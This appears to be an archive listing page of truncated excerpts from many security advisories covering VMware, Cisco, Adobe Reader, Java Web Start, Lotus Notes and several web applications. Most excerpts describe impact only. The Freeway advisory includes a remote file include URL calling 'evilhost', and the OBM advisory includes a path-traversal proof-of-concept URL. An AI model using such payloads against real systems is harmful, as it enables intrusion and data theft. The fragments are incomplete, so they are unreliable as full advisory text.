
exploitation

VMware Emulation Flaw x64 Guest Privilege Escalation (2/2)

user-mode code executing in a virtual machine may gain kernel
privileges within the virtual machine, dependent upon the guest
operating system.  The flaws have been proven exploitable on x64
versions of Windows, and they have produced potentially exploitable
crashes on x64 versions of *BSD.  The Linux kernel does not allow
exploitation of these flaws on x64 versions of Linux.


VULNERABILITY DETAILS
---------------------
This document describes two x64 instruction emulation flaws,

CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software

directly exploit Internet Explorer bugs or to target IE's security
configuration weaknesses.

In particular this attack vector exposes workstations to:
- Direct remote execution of arbitrary commands without user interaction.
- Direct exploitation of IE bugs without user interaction. For example,
  exploitation bugs that normally require the user to click on a URL
  provided by the attacker can be exploited directly using this attack
  vector.
- Direct injection of scripting code in Internet Explorer. For example,
  remotely injecting JavaScript code into the embedded IE control of the

RE: CORE-2007-0817: Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL's Instant Messaging software


VMware Emulation Flaw x64 Guest Privilege Escalation (1/2)

By exploiting the VMware flaw described in this document, user-mode
code executing in a virtual machine may gain kernel privileges within
the virtual machine, dependent upon the guest operating system.  The
flaw has been proven exploitable on x64 versions of Windows, and it
has produced potentially exploitable crashes on x64 versions of *BSD.
The Linux kernel does not allow exploitation of the flaws on x64
versions of Linux.


VULNERABILITY DETAILS
---------------------

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

when specific TCP segments are received during the TCP connection
termination phase.

This vulnerability is triggered only when specific TCP segments are sent
to certain TCP-based services that terminate on the affected appliance.
Although exploitation of this vulnerability requires a TCP three-way
handshake, authentication is not required.

This vulnerability is documented in Cisco bug ID CSCsz77717 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-0149.


CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

Virtual PC technology to implement the backward compatibility XP Mode
for legacy Windows applications. Using XP Mode, Windows 7 users can run
Windows applications on a virtualized Windows XP SP3 operating system
directly from the Windows 7 desktop but in doing so they may be
inadvertently increasing their risk due to a bug that makes standard
Windows anti-exploitation mechanisms ineffective.

A vulnerability found in the memory management of the Virtual Machine
Monitor makes memory pages mapped above the 2GB available with read or
read/write access to user-space programs running in a Guest operating
system. By leveraging this vulnerability it is possible to bypass

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Agent

Summary
=======

The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an
authenticated attacker to execute SQL statements that can cause
instability of the product or changes in the configuration.

[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php


1.2 Local File Include vulnerability found in script includes/events_application_top.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################


Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server

    Report Confidence -        Confirmed

Impact
======

Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system.

Successful exploitation of the CGI Command Injection (CSCtf97221)
vulnerability could allow an unauthenticated, remote attacker to take

Internet Explorer Script Interjection Code Execution

IMPACT
------
The vulnerability described in this document can be exploited by a
malicious Web page to execute arbitrary code with low integrity.
Active scripting must be enabled, and the present exploitation
techniques require that font downloading be set to "Enable" or
"Prompt" and that the "mailto:" protocol be present.  (These
requirements are satisfied by default on Windows XP, Windows Vista,
and Windows 7.)  The user is presented with a message box which must
be dismissed before code execution can occur.

Internet Explorer Script Interjection Code Execution (updated)


Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities

==================
Apple AppStore
Product: Wifi Photo Transfer 2.1 & 1.1 Pro


Exploitation-Technique:
=======================
Remote


Severity:

Cisco Security Advisory: Cisco IOS XR Software SSH Denial of Service Vulnerability

vulnerability that an unauthenticated, remote user could exploit to
cause a denial of service condition.

An attacker could trigger this vulnerability by sending a crafted SSH
version 2 packet that may cause a new SSH connection handler process to
crash. Repeated exploitation may cause each new SSH connection handler
process to crash and lead to a significant amount of memory being
consumed, which could introduce instability that may adversely impact
other system functionality. During this event, the parent SSH daemon
process will continue to function normally.


Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

======

Transparent Firewall Packet Buffer Exhaustion Vulnerability
+----------------------------------------------------------

Successful exploitation of this vulnerability could cause a decrease
in the number of available packet buffers. Repeated exploitation
could eventually deplete all available packet buffers, which may
cause an appliance to stop forwarding traffic.

SCCP Inspection Denial of Service Vulnerability

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Multipoint Switch

Impact
======

Successful exploitation of the Unauthenticated Java Servlet
(CSCtf42008, CSCtf01253) vulnerabilities could allow an
unauthenticated, remote attacker to take complete control of the
affected device.

Successful exploitation of the Unauthenticated Arbitrary File Upload

iDefense Security Advisory 01.12.10: Adobe Reader and Acrobat JpxDecode Memory Corruption Vulnerability

http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobat/

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in multiple
versions of Adobe Systems Inc.'s Reader and Acrobat PDF reader and
processor could allow an attacker to execute arbitrary code with the
privileges of the current user.

The vulnerability occurs when processing the Jp2c stream of a JpxDecode

iDefense Security Advisory 03.24.09: Adobe Reader and Acrobat JBIG2 Encoded Stream Heap Overflow Vulnerability

http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/

II. DESCRIPTION

Remote exploitation of a heap based buffer overflow vulnerability in
Adobe Systems Inc.'s Reader and Acrobat could allow an attacker to
execute arbitrary code with the privileges of the current user.

The vulnerability occurs when parsing a JBIG2-encoded stream inside of a
PDF file. JBIG2 is an image encoding format that is primarily used for

Cisco Security Advisory: IronPort Encryption Appliance / PostX and PXE Encryption Vulnerabilities

Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.

The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail

CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor

third-party library used by Lotus Notes to process Lotus 1-2-3 file
attachments.

These vulnerabilities could allow attackers to remotely execute arbitrary
commands on vulnerable systems by attaching a specially crafted file that
triggers exploitation when unsuspecting users attempt to "View" the
attachment. Exploitation of these vulnerabilities requires user intervention.

Although these specific vulnerabilities exist in a third-party component,
the problem is compounded by the way Lotus Notes displays information about
attachments, making it easier to elicit unsuspecting assistance from the

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Endpoint Devices

    Report Confidence -        Confirmed

Impact
======

Successful exploitation of the Unauthenticated CGI Access
(CSCtb31640) vulnerability could allow an unauthenticated, remote
attacker to take complete control of an affected device or system.

Successful exploitation of the CGI Command Injection (CSCtb31659,
CSCtb31685, and CSCth24672) vulnerabilities could allow an

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module

confidential data, propagation of worms, and other threats to the
corporate network.

A DoS vulnerability affects the MSN IM inspection feature of Cisco
ASA 5500 Series Adaptive Security Appliances. During successful
exploitation, an unauthenticated attacker could cause the affected
device to reload and may result in a sustained DoS condition.

Note: Only transit traffic can trigger this vulnerability; traffic that
is destined to the appliance will not trigger the vulnerability. MSN IM
inspection is not enabled by default.

Multiple vulnerabilities in OBM

The following PoC is available:

http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file

Successful exploitation of this vulnerability requires the attacker to be registered and logged in.

2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

Reserve Logic v1.2 Booking CMS - Multiple Vulnerabilities

==================
iScripts
Product: Reserve Logic (Booking) CMS v1.2


Exploitation-Technique:
=======================
Remote


Severity:

Trend Micro DirectPass 1.5.0.1060 - Multiple Vulnerabilities

==================
Trend Micro
Product: DirectPass 1.5.0.1060


Exploitation-Technique:
=======================
Local


Severity:

iDefense Security Advisory 06.11.09: Adobe Reader and Acrobat FlateDecode Integer Overflow Vulnerability

http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in multiple
versions of Adobe Systems Inc's Reader and Acrobat PDF reader and
processor could allow an attacker to execute arbitrary code with the
privileges of the current user.

The vulnerability occurs when parsing a FlateDecode filter inside a PDF

Cisco Security Advisory: Cisco IOS Software Border Gateway Protocol 4-Byte Autonomous System Number Vulnerabilities

that contains AS path segments made up of more than one thousand
autonomous systems, the device may crash with memory corruption, and
the error "%%Software-forced reload" will be displayed.

The following three conditions are required for successful
exploitation of this vulnerability:

  * Affected Cisco IOS Software device is a 4-byte AS number BGP
    speaker
  * BGP peering neighbor is a 2-byte AS number BGP speaker
  * BGP peering neighbor is capable of sending a BGP update with a

iDefense Security Advisory 03.26.09: Sun Java Web Start (JWS) GIF Decoding Heap Corruption Vulnerability

the JWS application. This XML-based file contains various parameters
that describe the Java application to be run.

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.

When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it

iDefense Security Advisory 03.26.09: Sun Java Web Start (JWS) PNG Decoding Integer Overflow Vulnerability

http://www.java.com

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.

When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it

Cisco Security Advisory: Cisco ACE Application Control Engine Device Manager and Application Networking Manager Vulnerabilities

=======

Multiple vulnerabilities exist in the Cisco Application Networking
Manager (ANM) and Cisco Application Control Engine (ACE) Device
Manager applications. These vulnerabilities are independent of each
other. Successful exploitation of these vulnerabilities may result in
unauthorized system or host operating system access.

This security advisory identifies the following vulnerabilities:

  * ACE Device Manager and ANM invalid directory permissions

iDefense Security Advisory 12.04.08: Sun Java Web Start GIF Decoding Memory Corruption Vulnerability

http://java.sun.com/javase/technologies/desktop/javawebstart/index.jsp

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with the privileges of the current user.

When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it

Copyright © 1995-2013 LinuxRocket.net. All rights reserved.